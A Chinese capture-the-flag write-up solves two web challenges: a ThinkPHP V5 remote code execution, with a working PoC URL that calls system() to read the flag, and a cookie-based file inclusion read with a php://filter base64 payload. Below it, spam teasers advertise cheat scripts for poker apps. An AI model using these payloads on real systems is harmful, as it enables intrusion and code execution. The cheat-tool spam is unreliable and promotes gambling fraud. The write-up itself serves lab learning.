攻防世界-Web题目1(ThinkPHP V5框架漏洞、php伪协议)
创始人
2024-12-26 11:11:15
0

目录

php_rce

1、题目

2、知识点

3、思路

fileinclude

4、题目

5、知识点

6、思路


php_rce

1、题目

2、知识点

ThinkPHP V5的框架漏洞

3、思路

打开题目,出现了一个框架,之前做过类似的题目

NSSCTF-Web题目7(ThinkPHP V5 框架漏洞)-CSDN博客

可以直接百度这个框架的利用漏洞,可以参考上面的链接

利用poc如下:

url+?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统执行命令

61.147.171.105:62936/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

得到flag:flag{thinkphp5_rce}


fileinclude

4、题目

5、知识点

php伪协议

6、思路

这里存在flag.php页面,直接访问没有内容,很多可能需要用到php伪协议来读取,那没有参数可以上传怎么办?

右键查看源代码

发现了源代码

代码的意思:$lan变量等于上传的cookie值,如果cookie值不等于english,则执行include($lan.".php"),有include函数我们可以利用php的伪协议

php://filter使用

php://filter/read=convert.base64-encode/resource=[文件名]

payload:language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

使用hackbar上传cookie值

使用base64解密:

Base64 编码/解码 - 锤子在线工具 (toolhelper.cn)

得到flag:cyberpeace{e19623df5651cd42ede812cc2f0f3fd9}


这篇文章就先写到这里了,哪里不懂的或者哪里不足的欢迎指出

相关内容

热门资讯

透视攻略!wepoker透视底... 透视攻略!wepoker透视底牌脚本,wepoker透视挂底牌(脚本)透视教程(竟然真的是有挂)-哔...
针对!aapoker怎么设置抽... 针对!aapoker怎么设置抽水,aa poker辅助(透视)窍门教程(本来存在有挂)-哔哩哔哩1、...
透视揭露!wpk模拟器多开(透... 透视揭露!wpk模拟器多开(透视)wpk安卓下载辅助,教程演示(有挂秘笈)-哔哩哔哩1、透视揭露!w...
透视手段!wepoker有没有... 透视手段!wepoker有没有辅助,wepoker私人局辅助(脚本)曝光教程(总是真的有挂)-哔哩哔...
备受关注的!aapoker怎么... 备受关注的!aapoker怎么选牌,aapoker辅助软件合法吗(透视)指南教程(一贯有挂)-哔哩哔...
透视有挂!wpk插件辅助(透视... 透视有挂!wpk插件辅助(透视)wpk插件,教程积累(有挂方针)-哔哩哔哩1、首先打开wpk插件辅助...
透视妙招!wepoker怎么破... 透视妙招!wepoker怎么破解游戏,wepoker有人用过吗(脚本)揭幕教程(一贯存在有挂)-哔哩...
为切实保障!aapoker透视... 为切实保障!aapoker透视方法,aapoker安装包怎么使用(透视)总结教程(真是是真的挂)-哔...
透视解迷!wpk辅助器(透视)... 透视解迷!wpk辅助器(透视)wpk透视是真的吗,教程法门(有挂教程)-哔哩哔哩该软件可以轻松地帮助...
透视讲义!wepoker透视版... 透视讲义!wepoker透视版下载,wepoker辅助软件视频(脚本)了解教程(果然是真的挂)-哔哩...